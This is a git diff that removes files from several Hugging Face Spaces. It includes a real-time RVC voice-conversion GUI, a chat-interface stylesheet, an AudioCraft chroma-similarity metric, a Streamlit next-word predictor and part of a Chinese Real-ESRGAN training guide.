self.if_f0 == 1: - infered_audio = ( - self.net_g.infer(feats, p_len, pitch, pitchf, sid)[0][0, 0] - .data.cpu() - .float() - ) - else: - infered_audio = ( - self.net_g.infer(feats, p_len, sid)[0][0, 0].data.cpu().float() - ) - torch.cuda.synchronize() - return infered_audio - - -class GUIConfig: - def __init__(self) -> None: - self.hubert_path: str = "" - self.pth_path: str = "" - self.index_path: str = "" - self.npy_path: str = "" - self.f0_method: str = "" - self.pitch: int = 12 - self.samplerate: int = 44100 - self.block_time: float = 1.0 # s - self.buffer_num: int = 1 - self.threhold: int = -30 - self.crossfade_time: float = 0.08 - self.extra_time: float = 0.04 - self.I_noise_reduce = False - self.O_noise_reduce = False - self.index_rate = 0.3 - - 
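Before the GUI classes below, it is worth isolating the index-retrieval blend used in `infer` above: each feature frame queries the index for its k=8 nearest training features, weights them by inverse squared distance, and mixes the retrieved average back with the original frame at `index_rate`. A minimal NumPy sketch of that blend — a brute-force search stands in for the real `index.search` (which is a faiss call), and the `1e-9` guard is an addition here to avoid dividing by an exact-match distance of zero:

```python
import numpy as np

def blend_with_index(feats, bank, index_rate, k=8):
    """Blend each frame in feats (T, D) with its k nearest neighbours
    from the feature bank (N, D), as in the try-block of infer()."""
    # Brute-force squared-L2 search; the real code delegates this to faiss.
    d2 = ((feats[:, None, :] - bank[None, :, :]) ** 2).sum(-1)   # (T, N)
    ix = np.argsort(d2, axis=1)[:, :k]                           # (T, k)
    score = np.take_along_axis(d2, ix, axis=1)                   # (T, k)

    # Inverse-square-distance weights, normalised per frame.
    # (The 1e-9 guard is added in this sketch; the original divides by score directly.)
    weight = np.square(1.0 / (score + 1e-9))
    weight /= weight.sum(axis=1, keepdims=True)

    # Weighted average of the retrieved bank rows, mixed back at index_rate.
    retrieved = np.sum(bank[ix] * weight[:, :, None], axis=1)    # (T, D)
    return index_rate * retrieved + (1 - index_rate) * feats
```

With `index_rate=0` the features pass through untouched, which is why the GUI's Index Rate slider at 0 effectively disables retrieval.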
-class GUI: - def __init__(self) -> None: - self.config = GUIConfig() - self.flag_vc = False - - self.launcher() - - def load(self): - ( - input_devices, - output_devices, - input_devices_indices, - output_devices_indices, - ) = self.get_devices() - try: - with open("values1.json", "r") as j: - data = json.load(j) - except: - # Injecting f0_method into the json data - with open("values1.json", "w") as j: - data = { - "pth_path": "", - "index_path": "", - "sg_input_device": input_devices[ - input_devices_indices.index(sd.default.device[0]) - ], - "sg_output_device": output_devices[ - output_devices_indices.index(sd.default.device[1]) - ], - "threhold": "-45", - "pitch": "0", - "index_rate": "0", - "block_time": "1", - "crossfade_length": "0.04", - "extra_time": "1", - } - return data - - def launcher(self): - data = self.load() - sg.theme("DarkTeal12") - input_devices, output_devices, _, _ = self.get_devices() - layout = [ - [ - sg.Frame( - title="Proudly forked by Mangio621", - ), - sg.Frame( - title=i18n("Load model"), - layout=[ - [ - sg.Input( - default_text="hubert_base.pt", - key="hubert_path", - disabled=True, - ), - sg.FileBrowse( - i18n("Hubert Model"), - initial_folder=os.path.join(os.getcwd()), - file_types=(("pt files", "*.pt"),), - ), - ], - [ - sg.Input( - default_text=data.get("pth_path", ""), - key="pth_path", - ), - sg.FileBrowse( - i18n("Select the .pth file"), - initial_folder=os.path.join(os.getcwd(), "weights"), - file_types=(("weight files", "*.pth"),), - ), - ], - [ - sg.Input( - default_text=data.get("index_path", ""), - key="index_path", - ), - sg.FileBrowse( - i18n("Select the .index file"), - initial_folder=os.path.join(os.getcwd(), "logs"), - file_types=(("index files", "*.index"),), - ), - ], - [ - sg.Input( - default_text="你不需要填写这个You don't need write this.", - key="npy_path", - disabled=True, - ), - sg.FileBrowse( - i18n("Select the .npy file"), - initial_folder=os.path.join(os.getcwd(), "logs"), - file_types=(("feature files", 
"*.npy"),), - ), - ], - ], - ), - ], - [ - # Mangio f0 Selection frame Here - sg.Frame( - layout=[ - [ - sg.Radio( - "Harvest", "f0_method", key="harvest", default=True - ), - sg.Radio("Crepe", "f0_method", key="reg-crepe"), - sg.Radio("Crepe Tiny", "f0_method", key="reg-crepe-tiny"), - ] - ], - title="Select an f0 Method", - ) - ], - [ - sg.Frame( - layout=[ - [ - sg.Text(i18n("Input device")), - sg.Combo( - input_devices, - key="sg_input_device", - default_value=data.get("sg_input_device", ""), - ), - ], - [ - sg.Text(i18n("Output device")), - sg.Combo( - output_devices, - key="sg_output_device", - default_value=data.get("sg_output_device", ""), - ), - ], - ], - title=i18n("Audio device (please use the same type of driver)"), - ) - ], - [ - sg.Frame( - layout=[ - [ - sg.Text(i18n("Response threshold")), - sg.Slider( - range=(-60, 0), - key="threhold", - resolution=1, - orientation="h", - default_value=data.get("threhold", ""), - ), - ], - [ - sg.Text(i18n("Pitch settings")), - sg.Slider( - range=(-24, 24), - key="pitch", - resolution=1, - orientation="h", - default_value=data.get("pitch", ""), - ), - ], - [ - sg.Text(i18n("Index Rate")), - sg.Slider( - range=(0.0, 1.0), - key="index_rate", - resolution=0.01, - orientation="h", - default_value=data.get("index_rate", ""), - ), - ], - ], - title=i18n("General settings"), - ), - sg.Frame( - layout=[ - [ - sg.Text(i18n("Sample length")), - sg.Slider( - range=(0.1, 3.0), - key="block_time", - resolution=0.1, - orientation="h", - default_value=data.get("block_time", ""), - ), - ], - [ - sg.Text(i18n("Fade length")), - sg.Slider( - range=(0.01, 0.15), - key="crossfade_length", - resolution=0.01, - orientation="h", - default_value=data.get("crossfade_length", ""), - ), - ], - [ - sg.Text(i18n("Extra推理时长")), - sg.Slider( - range=(0.05, 3.00), - key="extra_time", - resolution=0.01, - orientation="h", - default_value=data.get("extra_time", ""), - ), - ], - [ - sg.Checkbox(i18n("Input noise reduction"), key="I_noise_reduce"), 
- sg.Checkbox(i18n("Output noise reduction"), key="O_noise_reduce"), - ], - ], - title=i18n("Performance settings"), - ), - ], - [ - sg.Button(i18n("开始音频Convert"), key="start_vc"), - sg.Button(i18n("停止音频Convert"), key="stop_vc"), - sg.Text(i18n("Inference time (ms):")), - sg.Text("0", key="infer_time"), - ], - ] - self.window = sg.Window("RVC - GUI", layout=layout) - self.event_handler() - - def event_handler(self): - while True: - event, values = self.window.read() - if event == sg.WINDOW_CLOSED: - self.flag_vc = False - exit() - if event == "start_vc" and self.flag_vc == False: - if self.set_values(values) == True: - print("using_cuda:" + str(torch.cuda.is_available())) - self.start_vc() - settings = { - "pth_path": values["pth_path"], - "index_path": values["index_path"], - "f0_method": self.get_f0_method_from_radios(values), - "sg_input_device": values["sg_input_device"], - "sg_output_device": values["sg_output_device"], - "threhold": values["threhold"], - "pitch": values["pitch"], - "index_rate": values["index_rate"], - "block_time": values["block_time"], - "crossfade_length": values["crossfade_length"], - "extra_time": values["extra_time"], - } - with open("values1.json", "w") as j: - json.dump(settings, j) - if event == "stop_vc" and self.flag_vc == True: - self.flag_vc = False - - # Function that returns the used f0 method in string format "harvest" - def get_f0_method_from_radios(self, values): - f0_array = [ - {"name": "harvest", "val": values["harvest"]}, - {"name": "reg-crepe", "val": values["reg-crepe"]}, - {"name": "reg-crepe-tiny", "val": values["reg-crepe-tiny"]}, - ] - # Filter through to find a true value - used_f0 = "" - for f0 in f0_array: - if f0["val"] == True: - used_f0 = f0["name"] - break - if used_f0 == "": - used_f0 = "harvest" # Default Harvest if used_f0 is empty somehow - return used_f0 - - def set_values(self, values): - if len(values["pth_path"].strip()) == 0: - sg.popup(i18n("Select the pth file")) - return False - if 
len(values["index_path"].strip()) == 0: - sg.popup(i18n("Select the index file")) - return False - pattern = re.compile("[^\x00-\x7F]+") - if pattern.findall(values["hubert_path"]): - sg.popup(i18n("The hubert model path must not contain Chinese characters")) - return False - if pattern.findall(values["pth_path"]): - sg.popup(i18n("The pth file path must not contain Chinese characters.")) - return False - if pattern.findall(values["index_path"]): - sg.popup(i18n("The index file path must not contain Chinese characters.")) - return False - self.set_devices(values["sg_input_device"], values["sg_output_device"]) - self.config.hubert_path = os.path.join(current_dir, "hubert_base.pt") - self.config.pth_path = values["pth_path"] - self.config.index_path = values["index_path"] - self.config.npy_path = values["npy_path"] - self.config.f0_method = self.get_f0_method_from_radios(values) - self.config.threhold = values["threhold"] - self.config.pitch = values["pitch"] - self.config.block_time = values["block_time"] - self.config.crossfade_time = values["crossfade_length"] - self.config.extra_time = values["extra_time"] - self.config.I_noise_reduce = values["I_noise_reduce"] - self.config.O_noise_reduce = values["O_noise_reduce"] - self.config.index_rate = values["index_rate"] - return True - - def start_vc(self): - torch.cuda.empty_cache() - self.flag_vc = True - self.block_frame = int(self.config.block_time * self.config.samplerate) - self.crossfade_frame = int(self.config.crossfade_time * self.config.samplerate) - self.sola_search_frame = int(0.012 * self.config.samplerate) - self.delay_frame = int(0.01 * self.config.samplerate) # 往前预留0.02s - self.extra_frame = int(self.config.extra_time * self.config.samplerate) - self.rvc = None - self.rvc = RVC( - self.config.pitch, - self.config.f0_method, - self.config.hubert_path, - self.config.pth_path, - self.config.index_path, - self.config.npy_path, - self.config.index_rate, - ) - self.input_wav: np.ndarray = np.zeros( - 
self.extra_frame - + self.crossfade_frame - + self.sola_search_frame - + self.block_frame, - dtype="float32", - ) - self.output_wav: torch.Tensor = torch.zeros( - self.block_frame, device=device, dtype=torch.float32 - ) - self.sola_buffer: torch.Tensor = torch.zeros( - self.crossfade_frame, device=device, dtype=torch.float32 - ) - self.fade_in_window: torch.Tensor = torch.linspace( - 0.0, 1.0, steps=self.crossfade_frame, device=device, dtype=torch.float32 - ) - self.fade_out_window: torch.Tensor = 1 - self.fade_in_window - self.resampler1 = tat.Resample( - orig_freq=self.config.samplerate, new_freq=16000, dtype=torch.float32 - ) - self.resampler2 = tat.Resample( - orig_freq=self.rvc.tgt_sr, - new_freq=self.config.samplerate, - dtype=torch.float32, - ) - thread_vc = threading.Thread(target=self.soundinput) - thread_vc.start() - - def soundinput(self): - """ - 接受音频输入 - """ - with sd.Stream( - channels=2, - callback=self.audio_callback, - blocksize=self.block_frame, - samplerate=self.config.samplerate, - dtype="float32", - ): - while self.flag_vc: - time.sleep(self.config.block_time) - print("Audio block passed.") - print("ENDing VC") - - def audio_callback( - self, indata: np.ndarray, outdata: np.ndarray, frames, times, status - ): - """ - 音频处理 - """ - start_time = time.perf_counter() - indata = librosa.to_mono(indata.T) - if self.config.I_noise_reduce: - indata[:] = nr.reduce_noise(y=indata, sr=self.config.samplerate) - - """noise gate""" - frame_length = 2048 - hop_length = 1024 - rms = librosa.feature.rms( - y=indata, frame_length=frame_length, hop_length=hop_length - ) - db_threhold = librosa.amplitude_to_db(rms, ref=1.0)[0] < self.config.threhold - # print(rms.shape,db.shape,db) - for i in range(db_threhold.shape[0]): - if db_threhold[i]: - indata[i * hop_length : (i + 1) * hop_length] = 0 - self.input_wav[:] = np.append(self.input_wav[self.block_frame :], indata) - - # infer - print("input_wav:" + str(self.input_wav.shape)) - # 
print('infered_wav:'+str(infer_wav.shape)) - infer_wav: torch.Tensor = self.resampler2( - self.rvc.infer(self.resampler1(torch.from_numpy(self.input_wav))) - )[-self.crossfade_frame - self.sola_search_frame - self.block_frame :].to( - device - ) - print("infer_wav:" + str(infer_wav.shape)) - - # SOLA algorithm from https://github.com/yxlllc/DDSP-SVC - cor_nom = F.conv1d( - infer_wav[None, None, : self.crossfade_frame + self.sola_search_frame], - self.sola_buffer[None, None, :], - ) - cor_den = torch.sqrt( - F.conv1d( - infer_wav[None, None, : self.crossfade_frame + self.sola_search_frame] - ** 2, - torch.ones(1, 1, self.crossfade_frame, device=device), - ) - + 1e-8 - ) - sola_offset = torch.argmax(cor_nom[0, 0] / cor_den[0, 0]) - print("sola offset: " + str(int(sola_offset))) - - # crossfade - self.output_wav[:] = infer_wav[sola_offset : sola_offset + self.block_frame] - self.output_wav[: self.crossfade_frame] *= self.fade_in_window - self.output_wav[: self.crossfade_frame] += self.sola_buffer[:] - if sola_offset < self.sola_search_frame: - self.sola_buffer[:] = ( - infer_wav[ - -self.sola_search_frame - - self.crossfade_frame - + sola_offset : -self.sola_search_frame - + sola_offset - ] - * self.fade_out_window - ) - else: - self.sola_buffer[:] = ( - infer_wav[-self.crossfade_frame :] * self.fade_out_window - ) - - if self.config.O_noise_reduce: - outdata[:] = np.tile( - nr.reduce_noise( - y=self.output_wav[:].cpu().numpy(), sr=self.config.samplerate - ), - (2, 1), - ).T - else: - outdata[:] = self.output_wav[:].repeat(2, 1).t().cpu().numpy() - total_time = time.perf_counter() - start_time - self.window["infer_time"].update(int(total_time * 1000)) - print("infer time:" + str(total_time)) - print("f0_method: " + str(self.config.f0_method)) - - def get_devices(self, update: bool = True): - """获取设备列表""" - if update: - sd._terminate() - sd._initialize() - devices = sd.query_devices() - hostapis = sd.query_hostapis() - for hostapi in hostapis: - for device_idx in 
hostapi["devices"]: - devices[device_idx]["hostapi_name"] = hostapi["name"] - input_devices = [ - f"{d['name']} ({d['hostapi_name']})" - for d in devices - if d["max_input_channels"] > 0 - ] - output_devices = [ - f"{d['name']} ({d['hostapi_name']})" - for d in devices - if d["max_output_channels"] > 0 - ] - input_devices_indices = [ - d["index"] if "index" in d else d["name"] - for d in devices - if d["max_input_channels"] > 0 - ] - output_devices_indices = [ - d["index"] if "index" in d else d["name"] - for d in devices - if d["max_output_channels"] > 0 - ] - return ( - input_devices, - output_devices, - input_devices_indices, - output_devices_indices, - ) - - def set_devices(self, input_device, output_device): - """设置输出设备""" - ( - input_devices, - output_devices, - input_device_indices, - output_device_indices, - ) = self.get_devices() - sd.default.device[0] = input_device_indices[input_devices.index(input_device)] - sd.default.device[1] = output_device_indices[ - output_devices.index(output_device) - ] - print("input device:" + str(sd.default.device[0]) + ":" + str(input_device)) - print("output device:" + str(sd.default.device[1]) + ":" + str(output_device)) - - -gui = GUI() diff --git a/spaces/ShaunWithGPT/ChuanhuChatGPT/custom.css b/spaces/ShaunWithGPT/ChuanhuChatGPT/custom.css deleted file mode 100644 index abd4e9eb05d0f52c26db4ce0248475c2d8dbd1bb..0000000000000000000000000000000000000000 --- a/spaces/ShaunWithGPT/ChuanhuChatGPT/custom.css +++ /dev/null @@ -1,146 +0,0 @@ -/* status_display */ -#status_display { - display: flex; - min-height: 2.5em; - align-items: flex-end; - justify-content: flex-end; -} -#status_display p { - font-size: .85em; - font-family: monospace; - color: var(--text-color-subdued) !important; -} -/* chatbot */ -:root { - --bg-color-light: #F3F3F3; - --bg-color-dark: #121111; - } - -/* 对话气泡 */ -[class *= "message"] { - border-radius: var(--radius-xl) !important; - border: none; - padding: var(--spacing-xl) !important; - font-size: 
var(--text-md) !important; - line-height: var(--line-md) !important; -} -[data-testid = "bot"] { - max-width: 85%; - border-bottom-left-radius: 0 !important; -} -[data-testid = "user"] { - max-width: 85%; - width: auto !important; - border-bottom-right-radius: 0 !important; -} -/* 表格 */ -table { - margin: 1em 0; - border-collapse: collapse; - empty-cells: show; -} -td,th { - border: 1.2px solid var(--color-border-primary) !important; - padding: 0.2em; -} -thead { - background-color: rgba(175,184,193,0.2); -} -thead th { - padding: .5em .2em; -} -/* 行内代码 */ -code { - display: inline; - white-space: break-spaces; - border-radius: 6px; - margin: 0 2px 0 2px; - padding: .2em .4em .1em .4em; - background-color: rgba(175,184,193,0.2); -} -/* 代码块 */ -pre code { - display: block; - white-space: pre; - background-color: hsla(0, 0%, 0%, 80%)!important; - border-radius: 10px; - padding: 1rem 1.2rem 1rem; - margin: 1.2em 2em 1.2em 0.5em; - color: #FFF; - box-shadow: 6px 6px 16px hsla(0, 0%, 0%, 0.2); -} -/* 代码高亮样式 */ -.codehilite .hll { background-color: #49483e } -.codehilite .c { color: #75715e } /* Comment */ -.codehilite .err { color: #960050; background-color: #1e0010 } /* Error */ -.codehilite .k { color: #66d9ef } /* Keyword */ -.codehilite .l { color: #ae81ff } /* Literal */ -.codehilite .n { color: #f8f8f2 } /* Name */ -.codehilite .o { color: #f92672 } /* Operator */ -.codehilite .p { color: #f8f8f2 } /* Punctuation */ -.codehilite .ch { color: #75715e } /* Comment.Hashbang */ -.codehilite .cm { color: #75715e } /* Comment.Multiline */ -.codehilite .cp { color: #75715e } /* Comment.Preproc */ -.codehilite .cpf { color: #75715e } /* Comment.PreprocFile */ -.codehilite .c1 { color: #75715e } /* Comment.Single */ -.codehilite .cs { color: #75715e } /* Comment.Special */ -.codehilite .gd { color: #f92672 } /* Generic.Deleted */ -.codehilite .ge { font-style: italic } /* Generic.Emph */ -.codehilite .gi { color: #a6e22e } /* Generic.Inserted */ -.codehilite .gs { 
font-weight: bold } /* Generic.Strong */ -.codehilite .gu { color: #75715e } /* Generic.Subheading */ -.codehilite .kc { color: #66d9ef } /* Keyword.Constant */ -.codehilite .kd { color: #66d9ef } /* Keyword.Declaration */ -.codehilite .kn { color: #f92672 } /* Keyword.Namespace */ -.codehilite .kp { color: #66d9ef } /* Keyword.Pseudo */ -.codehilite .kr { color: #66d9ef } /* Keyword.Reserved */ -.codehilite .kt { color: #66d9ef } /* Keyword.Type */ -.codehilite .ld { color: #e6db74 } /* Literal.Date */ -.codehilite .m { color: #ae81ff } /* Literal.Number */ -.codehilite .s { color: #e6db74 } /* Literal.String */ -.codehilite .na { color: #a6e22e } /* Name.Attribute */ -.codehilite .nb { color: #f8f8f2 } /* Name.Builtin */ -.codehilite .nc { color: #a6e22e } /* Name.Class */ -.codehilite .no { color: #66d9ef } /* Name.Constant */ -.codehilite .nd { color: #a6e22e } /* Name.Decorator */ -.codehilite .ni { color: #f8f8f2 } /* Name.Entity */ -.codehilite .ne { color: #a6e22e } /* Name.Exception */ -.codehilite .nf { color: #a6e22e } /* Name.Function */ -.codehilite .nl { color: #f8f8f2 } /* Name.Label */ -.codehilite .nn { color: #f8f8f2 } /* Name.Namespace */ -.codehilite .nx { color: #a6e22e } /* Name.Other */ -.codehilite .py { color: #f8f8f2 } /* Name.Property */ -.codehilite .nt { color: #f92672 } /* Name.Tag */ -.codehilite .nv { color: #f8f8f2 } /* Name.Variable */ -.codehilite .ow { color: #f92672 } /* Operator.Word */ -.codehilite .w { color: #f8f8f2 } /* Text.Whitespace */ -.codehilite .mb { color: #ae81ff } /* Literal.Number.Bin */ -.codehilite .mf { color: #ae81ff } /* Literal.Number.Float */ -.codehilite .mh { color: #ae81ff } /* Literal.Number.Hex */ -.codehilite .mi { color: #ae81ff } /* Literal.Number.Integer */ -.codehilite .mo { color: #ae81ff } /* Literal.Number.Oct */ -.codehilite .sa { color: #e6db74 } /* Literal.String.Affix */ -.codehilite .sb { color: #e6db74 } /* Literal.String.Backtick */ -.codehilite .sc { color: #e6db74 } /* 
Literal.String.Char */ -.codehilite .dl { color: #e6db74 } /* Literal.String.Delimiter */ -.codehilite .sd { color: #e6db74 } /* Literal.String.Doc */ -.codehilite .s2 { color: #e6db74 } /* Literal.String.Double */ -.codehilite .se { color: #ae81ff } /* Literal.String.Escape */ -.codehilite .sh { color: #e6db74 } /* Literal.String.Heredoc */ -.codehilite .si { color: #e6db74 } /* Literal.String.Interpol */ -.codehilite .sx { color: #e6db74 } /* Literal.String.Other */ -.codehilite .sr { color: #e6db74 } /* Literal.String.Regex */ -.codehilite .s1 { color: #e6db74 } /* Literal.String.Single */ -.codehilite .ss { color: #e6db74 } /* Literal.String.Symbol */ -.codehilite .bp { color: #f8f8f2 } /* Name.Builtin.Pseudo */ -.codehilite .fm { color: #a6e22e } /* Name.Function.Magic */ -.codehilite .vc { color: #f8f8f2 } /* Name.Variable.Class */ -.codehilite .vg { color: #f8f8f2 } /* Name.Variable.Global */ -.codehilite .vi { color: #f8f8f2 } /* Name.Variable.Instance */ -.codehilite .vm { color: #f8f8f2 } /* Name.Variable.Magic */ -.codehilite .il { color: #ae81ff } /* Literal.Number.Integer.Long */ - -/* 全局元素 */ -* { - transition: all 0.6s; -} diff --git a/spaces/SuYuanS/AudioCraft_Plus/audiocraft/metrics/chroma_cosinesim.py b/spaces/SuYuanS/AudioCraft_Plus/audiocraft/metrics/chroma_cosinesim.py deleted file mode 100644 index 40c26081b803c2017fae1b6d7d086f0b0e074cef..0000000000000000000000000000000000000000 --- a/spaces/SuYuanS/AudioCraft_Plus/audiocraft/metrics/chroma_cosinesim.py +++ /dev/null @@ -1,72 +0,0 @@ -# Copyright (c) Meta Platforms, Inc. and affiliates. -# All rights reserved. -# -# This source code is licensed under the license found in the -# LICENSE file in the root directory of this source tree. - -import torch -import torchmetrics - -from ..data.audio_utils import convert_audio -from ..modules.chroma import ChromaExtractor - - -class ChromaCosineSimilarityMetric(torchmetrics.Metric): - """Chroma cosine similarity metric. 
- - This metric extracts a chromagram for a reference waveform and - a generated waveform and compares each frame using the cosine similarity - function. The output is the mean cosine similarity. - - Args: - sample_rate (int): Sample rate used by the chroma extractor. - n_chroma (int): Number of chroma used by the chroma extractor. - radix2_exp (int): Exponent for the chroma extractor. - argmax (bool): Whether the chroma extractor uses argmax. - eps (float): Epsilon for cosine similarity computation. - """ - def __init__(self, sample_rate: int, n_chroma: int, radix2_exp: int, argmax: bool, eps: float = 1e-8): - super().__init__() - self.chroma_sample_rate = sample_rate - self.n_chroma = n_chroma - self.eps = eps - self.chroma_extractor = ChromaExtractor(sample_rate=self.chroma_sample_rate, n_chroma=self.n_chroma, - radix2_exp=radix2_exp, argmax=argmax) - self.add_state("cosine_sum", default=torch.tensor(0.), dist_reduce_fx="sum") - self.add_state("weight", default=torch.tensor(0.), dist_reduce_fx="sum") - - def update(self, preds: torch.Tensor, targets: torch.Tensor, - sizes: torch.Tensor, sample_rates: torch.Tensor) -> None: - """Compute cosine similarity between chromagrams and accumulate scores over the dataset.""" - if preds.size(0) == 0: - return - - assert preds.shape == targets.shape, ( - f"Preds and target shapes mismatch: preds={preds.shape}, targets={targets.shape}") - assert preds.size(0) == sizes.size(0), ( - f"Number of items in preds ({preds.shape}) mismatch ", - f"with sizes ({sizes.shape})") - assert preds.size(0) == sample_rates.size(0), ( - f"Number of items in preds ({preds.shape}) mismatch ", - f"with sample_rates ({sample_rates.shape})") - assert torch.all(sample_rates == sample_rates[0].item()), "All sample rates are not the same in the batch" - - device = self.weight.device - preds, targets = preds.to(device), targets.to(device) # type: ignore - sample_rate = sample_rates[0].item() - preds = convert_audio(preds, from_rate=sample_rate, 
to_rate=self.chroma_sample_rate, to_channels=1) - targets = convert_audio(targets, from_rate=sample_rate, to_rate=self.chroma_sample_rate, to_channels=1) - gt_chroma = self.chroma_extractor(targets) - gen_chroma = self.chroma_extractor(preds) - chroma_lens = (sizes / self.chroma_extractor.winhop).ceil().int() - for i in range(len(gt_chroma)): - t = int(chroma_lens[i].item()) - cosine_sim = torch.nn.functional.cosine_similarity( - gt_chroma[i, :t], gen_chroma[i, :t], dim=1, eps=self.eps) - self.cosine_sum += cosine_sim.sum(dim=0) # type: ignore - self.weight += torch.tensor(t) # type: ignore - - def compute(self) -> float: - """Computes the average cosine similarty across all generated/target chromagrams pairs.""" - assert self.weight.item() > 0, "Unable to compute with total number of comparisons <= 0" # type: ignore - return (self.cosine_sum / self.weight).item() # type: ignore diff --git a/spaces/Sudhanshu976/NLP_FULL_APP/pages/7_NEXT_WORD_PREDICTOR.py b/spaces/Sudhanshu976/NLP_FULL_APP/pages/7_NEXT_WORD_PREDICTOR.py deleted file mode 100644 index 19c952e7f452f40dfbd69ee255522e6fc1137102..0000000000000000000000000000000000000000 --- a/spaces/Sudhanshu976/NLP_FULL_APP/pages/7_NEXT_WORD_PREDICTOR.py +++ /dev/null @@ -1,75 +0,0 @@ -import streamlit as st -import numpy as np - - -st.set_page_config( - page_title="NLP WEB APP" -) - -st.title("NEXT WORD PREDICTOR") -st.sidebar.success("Select a page above") - - -string1 = st.text_area("Enter the training text (Note : This may take time depending upon the data size )") - - - -test = st.text_input("ENTER THE WORD") -number = st.number_input("Enter the number of next words" ) -number = int(number) - - -import tensorflow as tf -import numpy as np -from tensorflow.keras.preprocessing.text import Tokenizer -from tensorflow.keras.preprocessing.sequence import pad_sequences -from tensorflow.keras.utils import to_categorical -from tensorflow.keras.models import Sequential -from tensorflow.keras.layers import 
Embedding,Dense,LSTM - -if st.button("PREDICT"): - tokenizer = Tokenizer() - tokenizer.fit_on_texts([string1]) - - input_sequences =[] - for sentence in string1.split("\n"): - tokenized_sentences = tokenizer.texts_to_sequences([sentence])[0] - - for i in range(1,len(tokenized_sentences)): - input_sequences.append(tokenized_sentences[:i+1]) - - - max_len = max([len(x) for x in input_sequences]) - use = max_len-1 - - padded_input_sentences = pad_sequences(input_sequences , maxlen = max_len , padding ="pre") - X = padded_input_sentences[:,:-1] - Y = padded_input_sentences[:,-1] - num_class = len(tokenizer.word_index) - Y = to_categorical(Y , num_classes=num_class+1) - - - - model = Sequential() - model.add(Embedding(num_class+1,100,input_length = None)) - - model.add(LSTM(250)) - - model.add(Dense(num_class+1,activation ="softmax")) - - model.compile(loss="categorical_crossentropy" , optimizer="adam" , metrics=["accuracy"]) - - - model.fit(X,Y,epochs=100) - - for i in range(number): - - - output_token = tokenizer.texts_to_sequences([test])[0] - padded_token = pad_sequences([output_token] , maxlen=max_len, padding="pre") - output = np.argmax(model.predict(padded_token)) - for word,index in tokenizer.word_index.items(): - if index == output: - test =test + " " + word - - st.header(test) diff --git a/spaces/Sumit7864/Image-Enhancer/docs/Training_CN.md b/spaces/Sumit7864/Image-Enhancer/docs/Training_CN.md deleted file mode 100644 index dabc3c5d97e134a2d551157c2dd03a629ec661bc..0000000000000000000000000000000000000000 --- a/spaces/Sumit7864/Image-Enhancer/docs/Training_CN.md +++ /dev/null @@ -1,271 +0,0 @@ -# :computer: 如何训练/微调 Real-ESRGAN - -- [训练 Real-ESRGAN](#训练-real-esrgan) - - [概述](#概述) - - [准备数据集](#准备数据集) - - [训练 Real-ESRNet 模型](#训练-real-esrnet-模型) - - [训练 Real-ESRGAN 模型](#训练-real-esrgan-模型) -- [用自己的数据集微调 Real-ESRGAN](#用自己的数据集微调-real-esrgan) - - [动态生成降级图像](#动态生成降级图像) - - [使用已配对的数据](#使用已配对的数据) - -[English](Training.md) **|** [简体中文](Training_CN.md) - -## 训练 Real-ESRGAN 
- -### 概述 - -训练分为两个步骤。除了 loss 函数外，这两个步骤使用相同的数据合成流程和训练管线。具体来说: - -1. 首先以预先训练的 ESRGAN 模型作为初始化，使用 L1 loss 训练 Real-ESRNet 模型。 - -2. 然后我们以 Real-ESRNet 模型作为生成器的初始化，结合 L1 loss、感知 loss 和 GAN loss 对 Real-ESRGAN 进行训练。 - -### 准备数据集 - -我们使用 DF2K ( DIV2K 和 Flickr2K ) + OST 数据集进行训练。只需要 HR 图像！
    -下面是网站链接: -1. DIV2K: http://data.vision.ee.ethz.ch/cvl/DIV2K/DIV2K_train_HR.zip -2. Flickr2K: https://cv.snu.ac.kr/research/EDSR/Flickr2K.tar -3. OST: https://openmmlab.oss-cn-hangzhou.aliyuncs.com/datasets/OST_dataset.zip - -以下是数据的准备步骤。 - -#### 第1步:【可选】生成多尺寸图片 - -针对 DF2K 数据集,我们使用多尺寸缩放策略,*换言之*,我们对 HR 图像进行下采样,就能获得多尺寸的标准参考(Ground-Truth)图像。
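上面的多尺寸思路可以直接用几行代码示意：把每张 HR 图像按若干比例缩小，每个缩小后的副本都当作一张额外的标准参考(Ground-Truth)图像。下面是一个极简的 NumPy 盒式滤波示意（实际请使用官方的 scripts/generate_multiscale_DF2K.py；这里的整数倍率和盒式滤波均仅作演示，与脚本实际使用的比例和重采样方法可能不同）：

```python
import numpy as np

def downscale(img, factor):
    """按整数倍率做盒式滤波下采样（仅示意；实际脚本会用更高质量的重采样）。"""
    h, w = img.shape[:2]
    h2, w2 = h - h % factor, w - w % factor  # 先裁到倍率的整数倍
    img = img[:h2, :w2]
    # 对每个 factor x factor 的块取均值；输出保留通道维
    return img.reshape(h2 // factor, factor, w2 // factor, factor, -1).mean(axis=(1, 3))

def generate_multiscale(hr, factors=(2, 3, 4)):
    """每个下采样倍率得到一张额外的 Ground-Truth 图像。"""
    return [downscale(hr, f) for f in factors]
```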
    -您可以使用这个 [scripts/generate_multiscale_DF2K.py](scripts/generate_multiscale_DF2K.py) 脚本快速生成多尺寸的图像。
    -注意:如果您只想简单试试,那么可以跳过此步骤。 - -```bash -python scripts/generate_multiscale_DF2K.py --input datasets/DF2K/DF2K_HR --output datasets/DF2K/DF2K_multiscale -``` - -#### 第2步:【可选】裁切为子图像 - -我们可以将 DF2K 图像裁切为子图像,以加快 IO 和处理速度。
    -如果你的 IO 够好或储存空间有限,那么此步骤是可选的。
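第2步的裁切本质上是一个滑动窗口：每隔 step 个像素裁出一块 crop_size 大小的子图。下面是这个思路的极简示意（官方 scripts/extract_subimages.py 还会处理图像边界、输出命名和压缩参数等细节）：

```python
import numpy as np

def extract_subimages(img, crop_size=400, step=200):
    """以 step 为步长滑动 crop_size 窗口，裁出所有完整的子图（仅示意）。"""
    h, w = img.shape[:2]
    subs = []
    for y in range(0, h - crop_size + 1, step):
        for x in range(0, w - crop_size + 1, step):
            subs.append(img[y:y + crop_size, x:x + crop_size])
    return subs
```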
    - -您可以使用脚本 [scripts/extract_subimages.py](scripts/extract_subimages.py)。这是使用示例: - -```bash - python scripts/extract_subimages.py --input datasets/DF2K/DF2K_multiscale --output datasets/DF2K/DF2K_multiscale_sub --crop_size 400 --step 200 -``` - -#### 第3步:准备元信息 txt - -您需要准备一个包含图像路径的 txt 文件。下面是 `meta_info_DF2Kmultiscale+OST_sub.txt` 中的部分展示(由于各个用户可能有截然不同的子图像划分,这个文件不适合你的需求,你得准备自己的 txt 文件): - -```txt -DF2K_HR_sub/000001_s001.png -DF2K_HR_sub/000001_s002.png -DF2K_HR_sub/000001_s003.png -... -``` - -你可以使用该脚本 [scripts/generate_meta_info.py](scripts/generate_meta_info.py) 生成包含图像路径的 txt 文件。
